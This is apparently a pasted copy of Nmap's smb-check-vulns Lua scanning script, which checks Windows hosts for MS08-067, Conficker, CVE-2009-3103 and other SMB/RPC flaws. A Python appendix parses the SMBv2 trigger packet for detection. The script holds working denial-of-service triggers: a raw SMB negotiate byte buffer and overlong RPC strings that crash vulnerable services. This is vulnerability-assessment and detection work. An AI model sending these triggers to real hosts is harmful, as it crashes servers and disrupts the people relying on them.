Untitled

a guest
May 10th, 2016
local msrpc = require "msrpc"
local nmap = require "nmap"
local smb = require "smb"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"

description = [[
Checks for vulnerabilities:
* MS08-067, a Windows RPC vulnerability
* Conficker, an infection by the Conficker worm
* Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in Windows 2000
* SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
* MS06-025, a Windows Ras RPC service vulnerability
* MS07-029, a Windows Dns Server RPC service vulnerability

WARNING: These checks are dangerous, and are very likely to bring down a server.
These should not be run in a production environment unless you (and, more importantly,
the business) understand the risks!

As a system administrator, performing these kinds of checks is crucial, because
a lot more damage can be done by a worm or a hacker using this vulnerability than
by a scanner. Penetration testers, on the other hand, might not want to use this
script -- crashing services is not generally a good way of sneaking through a
network.

If you set the script parameter <code>unsafe</code>, then scripts will run that are almost
(or totally) guaranteed to crash a vulnerable system; do NOT specify <code>unsafe</code>
in a production environment! And that isn't to say that non-unsafe scripts will
not crash a system, they're just less likely to.

If you set the script parameter <code>safe</code>, then scripts will run that rarely or never
crash a vulnerable system. No promises, though.

MS08-067. Checks if a host is vulnerable to MS08-067, a Windows RPC vulnerability that
can allow remote code execution. Checking for MS08-067 is very dangerous, as the check
is likely to crash systems. On a fairly wide scan conducted by Brandon Enright, we determined
that on average, a vulnerable system is more likely to crash than to survive
the check. Out of 82 vulnerable systems, 52 crashed.

At the same time, MS08-067 is extremely critical to fix. Metasploit has a working and
stable exploit for it, and any system vulnerable can very easily be compromised.

Conficker. Checks if a host is infected with a known Conficker strain. This check
is based on the simple conficker scanner found on this page:
http://iv.cs.uni-bonn.de/wg/cs/applications/containing-conficker.
Thanks to the folks who wrote that scanner!

regsvc DoS. Checks if a host is vulnerable to a crash in regsvc, caused
by a null pointer dereference. I inadvertently discovered this crash while working
on <code>smb-enum-sessions</code>, and discovered that it was repeatable. It's been
reported to Microsoft (case #MSRC8742).

This check WILL crash the service, if it's vulnerable, and requires a guest account
or higher to work. It is considered <code>unsafe</code>.

SMBv2 DoS. Performs a denial-of-service against the vulnerability disclosed in
CVE-2009-3103. Checks if the server went offline. This works against Windows Vista
and some versions of Windows 7, and causes a bluescreen if successful. The
proof-of-concept code at http://seclists.org/fulldisclosure/2009/Sep/39 was used,
with one small change.

MS06-025. The vulnerability targets the <code>RasRpcSubmitRequest()</code> RPC method, which is
part of the RASRPC interface that serves as an RPC service for configuring and
getting information from the Remote Access and Routing service. RASRPC can be
accessed using either the "\ROUTER" SMB pipe or the "\SRVSVC" SMB pipe (usually on Windows XP machines).
In RPC terms this is known as the "ncacn_np" transport. <code>RasRpcSubmitRequest()</code>
is a generic method which provides different functionality according
to the <code>RequestBuffer</code> structure and particularly the <code>RegType</code> field within that
structure. The <code>RegType</code> field is of type <code>enum ReqTypes</code>. This enum type lists all
the different operations that can be performed using the <code>RasRpcSubmitRequest()</code>
RPC method. The one particular operation that this vuln targets is the <code>REQTYPE_GETDEVCONFIG</code>
request to get device information on the RRAS.

MS07-029. The vulnerability targets the <code>R_DnssrvQuery()</code> and <code>R_DnssrvQuery2()</code> RPC methods, which are
part of the DNS Server RPC interface that serves as an RPC service for configuring and
getting information from the DNS Server service. The DNS Server RPC service can be
accessed using the "\dnsserver" SMB named pipe. The vulnerability is triggered when
a long string is sent as the "zone" parameter, which causes a buffer overflow that
crashes the service.

(Note: if you have other SMB/MSRPC vulnerability checks you'd like to see added, and
you can show me a tool with a license that is compatible with Nmap's, post a request
on the nmap-dev mailing list and I'll add it to my list [Ron Bowes].)
]]
---
--@usage
-- nmap --script smb-check-vulns.nse -p445 <host>
-- sudo nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 <host>
--
--@output
-- Host script results:
-- | smb-check-vulns:
-- |   MS08-067: NOT VULNERABLE
-- |   Conficker: Likely CLEAN
-- |   regsvc DoS: regsvc DoS: NOT VULNERABLE
-- |   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
-- |   MS06-025: NO SERVICE (the Ras RPC service is inactive)
-- |_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
--
-- @args unsafe If set, this script will run checks that, if the system isn't
--        patched, are basically guaranteed to crash something. Remember that
--        non-unsafe checks aren't necessarily safe either.
-- @args safe If set, this script will only run checks that are known (or at
--        least suspected) to be safe.
-----------------------------------------------------------------------

author = "Ron Bowes"
copyright = "Ron Bowes"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"intrusive","exploit","dos","vuln"}
-- run after all smb-* scripts (so if it DOES crash something, the other
-- scans have already had a chance to run)
dependencies = {
  "smb-brute", "smb-enum-sessions", "smb-security-mode",
  "smb-enum-shares", "smb-server-stats",
  "smb-enum-domains", "smb-enum-users", "smb-system-info",
  "smb-enum-groups", "smb-os-discovery", "smb-enum-processes",
  "smb-psexec",
};


hostrule = function(host)
  return smb.get_port(host) ~= nil
end

-- Result codes returned by the individual checks
local VULNERABLE = 1
local PATCHED = 2
local UNKNOWN = 3
local NOTRUN = 4
local INFECTED = 5
local INFECTED2 = 6
local CLEAN = 7
local NOTUP = 8
---Check if the server is patched for MS08-067. This is done by calling NetPathCompare with an
-- illegal string. If the string is accepted, then the server is vulnerable; if it's rejected, then
-- you're safe (for now).
--
-- Based on a packet cap of this script, thanks go out to the author:
-- http://labs.portcullis.co.uk/application/ms08-067-check/
--
-- If there's a licensing issue, please let me (Ron Bowes) know so I can
--
-- NOTE: This CAN crash stuff (ie, crash svchost and force a reboot), so beware! In about 20
-- tests I did, it crashed once. This is not a guarantee.
--
--@param host The host object.
--@return (status, result) If status is false, result is an error code; otherwise, result is either
--        <code>VULNERABLE</code> for vulnerable, <code>PATCHED</code> for not vulnerable,
--        <code>UNKNOWN</code> if there was an error (likely vulnerable), <code>NOTRUN</code>
--        if this check was disabled, and <code>INFECTED</code> if it was patched by Conficker.
function check_ms08_067(host)
  if(nmap.registry.args.safe ~= nil) then
    return true, NOTRUN
  end
  if(nmap.registry.args.unsafe == nil) then
    return true, NOTRUN
  end
  local status, smbstate
  local bind_result, netpathcompare_result

  -- Create the SMB session
  status, smbstate = msrpc.start_smb(host, "\\\\BROWSER")
  if(status == false) then
    return false, smbstate
  end

  -- Bind to SRVSVC service
  status, bind_result = msrpc.bind(smbstate, msrpc.SRVSVC_UUID, msrpc.SRVSVC_VERSION, nil)
  if(status == false) then
    msrpc.stop_smb(smbstate)
    return false, bind_result
  end

  -- Call netpathcanonicalize
  -- status, netpathcanonicalize_result = msrpc.srvsvc_netpathcanonicalize(smbstate, host.ip, "\\a", "\\test\\")

  local path1 = "\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\..\\n"
  local path2 = "\\n"
  status, netpathcompare_result = msrpc.srvsvc_netpathcompare(smbstate, host.ip, path1, path2, 1, 0)

  -- Stop the SMB session
  msrpc.stop_smb(smbstate)

  -- The error string tells the patched, Conficker-patched and broken cases apart
  if(status == false) then
    if(string.find(netpathcompare_result, "WERR_INVALID_PARAMETER") ~= nil) then
      return true, INFECTED
    elseif(string.find(netpathcompare_result, "INVALID_NAME") ~= nil) then
      return true, PATCHED
    else
      return true, UNKNOWN, netpathcompare_result
    end
  end

  -- The illegal path was accepted: unpatched
  return true, VULNERABLE
end
-- Help messages for the more common errors seen by the Conficker check.
CONFICKER_ERROR_HELP = {
  ["NT_STATUS_BAD_NETWORK_NAME"] =
[[UNKNOWN; Network name not found (required service has crashed). (Error NT_STATUS_BAD_NETWORK_NAME)]],
  -- http://seclists.org/nmap-dev/2009/q1/0918.html "non-Windows boxes (Samba on Linux/OS X, or a printer)"
  -- http://www.skullsecurity.org/blog/?p=209#comment-156
  --   "That means either it isn’t a Windows machine, or the service is
  --    either crashed or not running. That may indicate a failed (or
  --    successful) exploit attempt, or just a locked down system.
  --    NT_STATUS_OBJECT_NAME_NOT_FOUND can be returned if the browser
  --    service is disabled. There are at least two ways that can happen:
  --    1) The service itself is disabled in the services list.
  --    2) The registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Browser\Parameters\MaintainServerList
  --       is set to Off/False/No rather than Auto or yes.
  --    On these systems, if you reenable the browser service, then the
  --    test will complete."
  ["NT_STATUS_OBJECT_NAME_NOT_FOUND"] =
[[UNKNOWN; not Windows, or Windows with disabled browser service (CLEAN); or Windows with crashed browser service (possibly INFECTED).
|  If you know the remote system is Windows, try rebooting it and scanning
|_ again. (Error NT_STATUS_OBJECT_NAME_NOT_FOUND)]],
  -- http://www.skullsecurity.org/blog/?p=209#comment-100
  --   "That likely means that the server has been locked down, so we
  --    don’t have access to the necessary pipe. Fortunately, that means
  --    that neither does Conficker — NT_STATUS_ACCESS_DENIED probably
  --    means you’re ok."
  ["NT_STATUS_ACCESS_DENIED"] =
[[Likely CLEAN; access was denied.
|  If you have a login, try using --script-args=smbuser=xxx,smbpass=yyy
|  (replace xxx and yyy with your username and password). Also try
|_ smbdomain=zzz if you know the domain. (Error NT_STATUS_ACCESS_DENIED)]],
  -- The cause of these two is still unknown.
  -- ["NT_STATUS_NOT_SUPPORTED"] =
  -- [[]]
  -- http://thatsbroken.com/?cat=5 (doesn't seem common)
  -- ["NT_STATUS_REQUEST_NOT_ACCEPTED"] =
  -- [[]]
}

---Check if the server is infected with Conficker. This can be detected by a modified MS08-067 patch,
-- which rejects a different illegal string than the official patch rejects.
--
-- Based loosely on the Simple Conficker Scanner, found here:
-- http://iv.cs.uni-bonn.de/wg/cs/applications/containing-conficker/
--
-- If there's a licensing issue, please let me (Ron Bowes) know so I can fix it
--
--@param host The host object.
--@return (status, result) If status is false, result is an error code; otherwise, result is either
--        <code>INFECTED</code> for infected, <code>INFECTED2</code> for Conficker.D, or
--        <code>CLEAN</code> for not infected.
function check_conficker(host)
  local status, smbstate
  local bind_result, netpathcompare_result

  -- Create the SMB session
  status, smbstate = msrpc.start_smb(host, "\\\\BROWSER", true)
  if(status == false) then
    return false, smbstate
  end

  -- Bind to SRVSVC service
  status, bind_result = msrpc.bind(smbstate, msrpc.SRVSVC_UUID, msrpc.SRVSVC_VERSION, nil)
  if(status == false) then
    msrpc.stop_smb(smbstate)
    return false, bind_result
  end

  -- Try checking a valid string to find Conficker.D
  local netpathcanonicalize_result, error_result
  status, netpathcanonicalize_result, error_result = msrpc.srvsvc_netpathcanonicalize(smbstate, host.ip, "\\")
  if(status == true and netpathcanonicalize_result['can_path'] == 0x5c45005c) then
    msrpc.stop_smb(smbstate)
    return true, INFECTED2
  end

  -- Try checking an illegal string ("\..\") to find Conficker.C and earlier
  status, netpathcanonicalize_result, error_result = msrpc.srvsvc_netpathcanonicalize(smbstate, host.ip, "\\..\\")

  if(status == false) then
    if(string.find(netpathcanonicalize_result, "INVALID_NAME")) then
      msrpc.stop_smb(smbstate)
      return true, CLEAN
    elseif(string.find(netpathcanonicalize_result, "WERR_INVALID_PARAMETER") ~= nil) then
      msrpc.stop_smb(smbstate)
      return true, INFECTED
    else
      msrpc.stop_smb(smbstate)
      return false, netpathcanonicalize_result
    end
  end

  -- Stop the SMB session
  msrpc.stop_smb(smbstate)

  return true, CLEAN
end
---While writing <code>smb-enum-sessions</code> I discovered a repeatable null-pointer dereference
-- in regsvc. I reported it to Microsoft, but because it's a simple DoS (and barely even that, because
-- the service automatically restarts), and because it's only in Windows 2000, it isn't likely that they'll
-- fix it. This function checks for that crash (by crashing the process).
--
-- The crash occurs when the string sent to winreg_enumkey() function is null.
--
--@param host The host object.
--@return (status, result) If status is false, result is an error code; otherwise, result is either
--        <code>VULNERABLE</code> for vulnerable or <code>PATCHED</code> for not vulnerable. If the check
--        was skipped, <code>NOTRUN</code> is returned.
function check_winreg_Enum_crash(host)
  if(nmap.registry.args.safe ~= nil) then
    return true, NOTRUN
  end
  if(nmap.registry.args.unsafe == nil) then
    return true, NOTRUN
  end

  local status, bind_result, smbstate

  -- Create the SMB session
  status, smbstate = msrpc.start_smb(host, msrpc.WINREG_PATH)
  if(status == false) then
    return false, smbstate
  end

  -- Bind to WINREG service
  status, bind_result = msrpc.bind(smbstate, msrpc.WINREG_UUID, msrpc.WINREG_VERSION, nil)
  if(status == false) then
    msrpc.stop_smb(smbstate)
    return false, bind_result
  end

  local openhku_result
  status, openhku_result = msrpc.winreg_openhku(smbstate)
  if(status == false) then
    msrpc.stop_smb(smbstate)
    return false, openhku_result
  end

  -- Enumerate the first key under HKEY_USERS with a nil name; a vulnerable
  -- regsvc dereferences the null pointer and the call fails
  local enumkey_result
  status, enumkey_result = msrpc.winreg_enumkey(smbstate, openhku_result['handle'], 0, nil)
  msrpc.stop_smb(smbstate)

  if(status == false) then
    return true, VULNERABLE
  end

  return true, PATCHED
end
local function check_smbv2_dos(host)
  local status, result

  if(nmap.registry.args.safe ~= nil) then
    return true, NOTRUN
  end
  if(nmap.registry.args.unsafe == nil) then
    return true, NOTRUN
  end

  -- From http://seclists.org/fulldisclosure/2009/Sep/0039.html with one change on the last line.
  local buf = string.char(0x00, 0x00, 0x00, 0x90) ..                     -- Begin SMB header: Session message
              string.char(0xff, 0x53, 0x4d, 0x42) ..                     -- Server Component: SMB
              string.char(0x72, 0x00, 0x00, 0x00) ..                     -- Negotiate Protocol
              string.char(0x00, 0x18, 0x53, 0xc8) ..                     -- Operation 0x18 & sub 0xc853
              string.char(0x00, 0x26) ..                                 -- Process ID High: normal value would be 0x00, 0x00
              string.char(0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xfe) ..
              string.char(0x00, 0x00, 0x00, 0x00, 0x00, 0x6d, 0x00, 0x02, 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54) ..
              string.char(0x57, 0x4f, 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52, 0x41, 0x4d, 0x20, 0x31) ..
              string.char(0x2e, 0x30, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e, 0x30, 0x00) ..
              string.char(0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57) ..
              string.char(0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61) ..
              string.char(0x00, 0x02, 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30, 0x32, 0x00, 0x02, 0x4c) ..
              string.char(0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54, 0x20, 0x4c) ..
              string.char(0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, 0x00, 0x02, 0x53, 0x4d, 0x42, 0x20, 0x32, 0x2e) ..
              string.char(0x30, 0x30, 0x32, 0x00)

  local socket = nmap.new_socket()
  if(socket == nil) then
    return false, "Couldn't create socket"
  end

  status, result = socket:connect(host, 445)
  if(status == false) then
    socket:close()
    return false, "Couldn't connect to host: " .. result
  end

  status, result = socket:send(buf)
  if(status == false) then
    socket:close()
    return false, "Couldn't send the buffer: " .. result
  end

  -- Close the socket
  socket:close()

  -- Give it some time to crash
  stdnse.print_debug(1, "smb-check-vulns: Waiting 5 seconds to see if Windows crashed")
  stdnse.sleep(5)

  -- Create a new socket
  socket = nmap.new_socket()
  if(socket == nil) then
    return false, "Couldn't create socket"
  end

  -- Try and do something simple
  stdnse.print_debug(1, "smb-check-vulns: Attempting to connect to the host")
  socket:set_timeout(5000)
  status, result = socket:connect(host, 445)

  -- Check the result
  if(status == false or status == nil) then
    stdnse.print_debug(1, "smb-check-vulns: Connect failed, host is likely vulnerable!")
    socket:close()
    return true, VULNERABLE
  end

  -- Try sending something
  stdnse.print_debug(1, "smb-check-vulns: Attempting to send data to the host")
  status, result = socket:send("AAAA")
  if(status == false or status == nil) then
    stdnse.print_debug(1, "smb-check-vulns: Send failed, host is likely vulnerable!")
    socket:close()
    return true, VULNERABLE
  end

  stdnse.print_debug(1, "smb-check-vulns: Checks finished; host is likely not vulnerable.")
  socket:close()
  return true, PATCHED
end
---Check the existence of ms06_025 vulnerability in Microsoft Routing and Remote
--Access Service. This check is not safe as it crashes the RRAS service and
--its dependencies.
--@param host Host object.
--@return (status, result)
--* <code>status == false</code> -> <code>result == NOTUP</code> which designates
--that the targeted Ras RPC service is not active.
--* <code>status == true</code> ->
-- ** <code>result == VULNERABLE</code> for vulnerable.
-- ** <code>result == PATCHED</code> for not vulnerable.
-- ** <code>result == NOTRUN</code> if check skipped.
function check_ms06_025(host)
  --check for safety flag
  if(nmap.registry.args.safe ~= nil) then
    return true, NOTRUN
  end
  if(nmap.registry.args.unsafe == nil) then
    return true, NOTRUN
  end
  --create the SMB session
  --first we try with the "\router" pipe, then the "\srvsvc" pipe.
  local status, smb_result, smbstate, err_msg
  status, smb_result = msrpc.start_smb(host, msrpc.ROUTER_PATH)
  if(status == false) then
    err_msg = smb_result
    status, smb_result = msrpc.start_smb(host, msrpc.SRVSVC_PATH) --rras is also accessible across SRVSVC pipe
    if(status == false) then
      return false, NOTUP --if not accessible across both pipes then service is inactive
    end
  end
  smbstate = smb_result
  --bind to RRAS service
  local bind_result
  status, bind_result = msrpc.bind(smbstate, msrpc.RASRPC_UUID, msrpc.RASRPC_VERSION, nil)
  if(status == false) then
    msrpc.stop_smb(smbstate)
    return false, UNKNOWN --if bind operation results with a false status we can't conclude anything.
  end
  if(bind_result['ack_result'] == 0x02) then --0x02 == PROVIDER_REJECTION
    msrpc.stop_smb(smbstate)
    return false, NOTUP --if bind operation results with true but PROVIDER_REJECTION, then the service is inactive.
  end
  --build a GETDEVCONFIG request with an oversized, random payload
  local req, sr_result
  req = msrpc.RRAS_marshall_RequestBuffer(
    0x01,
    msrpc.RRAS_RegTypes['GETDEVCONFIG'],
    msrpc.random_crap(3000))
  status, sr_result = msrpc.RRAS_SubmitRequest(smbstate, req)
  msrpc.stop_smb(smbstate)
  --sanity check: a broken pipe means the service died on the request
  if(status == false) then
    stdnse.print_debug(
      3,
      "check_ms06_025: RRAS_SubmitRequest failed")
    if(sr_result == "NT_STATUS_PIPE_BROKEN") then
      return true, VULNERABLE
    else
      return true, PATCHED
    end
  else
    return true, PATCHED
  end
end
---Check the existence of ms07_029 vulnerability in Microsoft Dns Server service.
--This check is not safe as it crashes the Dns Server RPC service and its dependencies.
--@param host Host object.
--@return (status, result)
--* <code>status == false</code> -> <code>result == NOTUP</code> which designates
--that the targeted Dns Server RPC service is not active.
--* <code>status == true</code> ->
-- ** <code>result == VULNERABLE</code> for vulnerable.
-- ** <code>result == PATCHED</code> for not vulnerable.
-- ** <code>result == NOTRUN</code> if check skipped.
function check_ms07_029(host)
  --check for safety flag
  if(nmap.registry.args.safe ~= nil) then
    return true, NOTRUN
  end
  if(nmap.registry.args.unsafe == nil) then
    return true, NOTRUN
  end
  --create the SMB session
  local status, smbstate
  status, smbstate = msrpc.start_smb(host, msrpc.DNSSERVER_PATH)
  if(status == false) then
    return false, NOTUP --if not accessible across pipe then the service is inactive
  end
  --bind to DNSSERVER service
  local bind_result
  status, bind_result = msrpc.bind(smbstate, msrpc.DNSSERVER_UUID, msrpc.DNSSERVER_VERSION)
  if(status == false) then
    msrpc.stop_smb(smbstate)
    return false, UNKNOWN --if bind operation results with a false status we can't conclude anything.
  end
  --call R_DnssrvQuery with an overlong "zone" string
  local q_result
  status, q_result = msrpc.DNSSERVER_Query(
    smbstate,
    "VULNSRV",
    string.rep("\\\13", 1000),
    1)--any op num will do
  --sanity check: a broken pipe means the service died on the request
  msrpc.stop_smb(smbstate)
  if(status == false) then
    stdnse.print_debug(
      3,
      "check_ms07_029: DNSSERVER_Query failed")
    if(q_result == "NT_STATUS_PIPE_BROKEN") then
      return true, VULNERABLE
    else
      return true, PATCHED
    end
  else
    return true, PATCHED
  end
end
---Returns the appropriate text to display, if any.
--
--@param check The name of the check; for example, 'ms08-067'.
--@param message The message to display, such as 'VULNERABLE' or 'PATCHED'.
--@param description [optional] Extra details about the message. nil for a blank message.
--@param minimum_verbosity The minimum verbosity level required before the message is displayed.
--@param minimum_debug [optional] The minimum debug level required before the message is displayed (default: 0).
--@return A string with a textual representation of the error (or empty string, if it was determined that the message shouldn't be displayed).
local function get_response(check, message, description, minimum_verbosity, minimum_debug)
  if(minimum_debug == nil) then
    minimum_debug = 0
  end

  -- Check if we have appropriate verbosity/debug
  if(nmap.verbosity() >= minimum_verbosity and nmap.debugging() >= minimum_debug) then
    if(description == nil or description == '') then
      return string.format("%s: %s", check, message)
    else
      return string.format("%s: %s (%s)", check, message, description)
    end
  else
    return nil
  end
end

action = function(host)

  local status, result, message
  local response = {}

  -- Check for ms08-067. This version of the script only reports that check;
  -- every result code check_ms08_067() documents is mapped to a line of output.
  status, result, message = check_ms08_067(host)
  if(status == false) then
    table.insert(response, get_response("MS08-067", "ERROR", result, 0, 1))
  else
    if(result == VULNERABLE) then
      table.insert(response, get_response("MS08-067", "VULNERABLE", nil, 0))
    elseif(result == UNKNOWN) then
      table.insert(response, get_response("MS08-067", "LIKELY VULNERABLE", message, 1))
    elseif(result == INFECTED) then
      table.insert(response, get_response("MS08-067", "NOT VULNERABLE", "patched by Conficker", 1))
    elseif(result == NOTRUN) then
      table.insert(response, get_response("MS08-067", "CHECK DISABLED", "add '--script-args=unsafe=1' to run", 1))
    else
      table.insert(response, get_response("MS08-067", "NOT VULNERABLE", nil, 1))
    end
  end

  return stdnse.format_output(true, response)

end
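The buffer that check_smbv2_dos sends is an ordinary SMB1 Negotiate Protocol request whose Process ID High field is 0x2600 instead of zero. The following Python is an added example, not part of the NSE script: it parses that exact byte sequence as a NetBIOS-framed capture and flags the combination CVE-2009-3103 mishandled (non-zero Process ID High on a negotiate that offers the SMB2 dialect); the function names and the detector rule are this example's own.

```python
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
SMB2_DIALECT = "SMB 2.002"

# Constructed sample: the bytes check_smbv2_dos() concatenates, as one NetBIOS
# session message. It is only parsed here, never transmitted.
NEGOTIATE_PID_HIGH_SAMPLE = bytes([
    0x00, 0x00, 0x00, 0x90,             # NetBIOS session message, length 0x90
    0xff, 0x53, 0x4d, 0x42,             # "\xffSMB"
    0x72, 0x00, 0x00, 0x00,             # Command 0x72 (Negotiate), Status bytes 1-3
    0x00, 0x18, 0x53, 0xc8,             # Status byte 4, Flags 0x18, Flags2 0xc853
    0x00, 0x26,                         # Process ID High 0x2600; a normal client sends 0
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xfe,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x6d, 0x00, 0x02, 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54,
    0x57, 0x4f, 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52, 0x41, 0x4d, 0x20, 0x31,
    0x2e, 0x30, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e, 0x30, 0x00,
    0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,
    0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61,
    0x00, 0x02, 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30, 0x32, 0x00, 0x02, 0x4c,
    0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54, 0x20, 0x4c,
    0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, 0x00, 0x02, 0x53, 0x4d, 0x42, 0x20, 0x32, 0x2e,
    0x30, 0x30, 0x32, 0x00,
])


def parse_smb1_negotiate(pkt: bytes) -> dict:
    """Parse a NetBIOS-framed SMB1 Negotiate Protocol request.

    Returns the header fields the check cares about plus the dialect list.
    Raises ValueError on anything malformed so a truncated or non-SMB packet
    is never mistaken for a benign negotiate.
    """
    if len(pkt) < 4 + 32 + 3:
        raise ValueError("too short for NetBIOS + SMB header + WordCount/ByteCount")
    nb_type = pkt[0]
    nb_len = int.from_bytes(pkt[1:4], "big")
    if nb_type != 0x00 or nb_len != len(pkt) - 4:
        raise ValueError("bad NetBIOS session header or length mismatch")
    body = pkt[4:]
    if body[:4] != SMB_MAGIC:
        raise ValueError("not an SMB1 message")
    # 28 bytes after the magic, all little-endian: Command, Status, Flags,
    # Flags2, PIDHigh, Signature(8), Reserved, TID, PIDLow, UID, MID
    (cmd, _status, _flags, flags2, pid_high, _sig, _rsvd,
     _tid, pid_low, _uid, _mid) = struct.unpack_from("<BIBHH8sHHHHH", body, 4)
    if cmd != SMB_COM_NEGOTIATE:
        raise ValueError("not a Negotiate Protocol request")
    word_count = body[32]
    bc_off = 33 + 2 * word_count
    if bc_off + 2 > len(body):
        raise ValueError("WordCount runs past the packet")
    byte_count, = struct.unpack_from("<H", body, bc_off)
    data = body[bc_off + 2:bc_off + 2 + byte_count]
    if len(data) != byte_count:
        raise ValueError("ByteCount runs past the packet")
    # Each dialect is a 0x02 buffer-format byte followed by a NUL-terminated name
    dialects = [d[1:].decode("ascii", "replace")
                for d in data.split(b"\x00") if d.startswith(b"\x02")]
    return {"pid_high": pid_high, "pid_low": pid_low, "flags2": flags2,
            "dialects": dialects}


def is_cve_2009_3103_trigger(pkt: bytes) -> bool:
    """Detector rule (this example's own): a Negotiate that offers the SMB2
    dialect while carrying a non-zero Process ID High."""
    try:
        f = parse_smb1_negotiate(pkt)
    except ValueError:
        return False
    return f["pid_high"] != 0 and SMB2_DIALECT in f["dialects"]


def set_pid_high(pkt: bytes, value: int) -> bytes:
    """Copy of pkt with Process ID High replaced; used to build the benign
    control case (a normal client sends 0)."""
    off = 4 + 12  # NetBIOS(4) + magic(4) + Command(1) + Status(4) + Flags(1) + Flags2(2)
    return pkt[:off] + struct.pack("<H", value) + pkt[off + 2:]
```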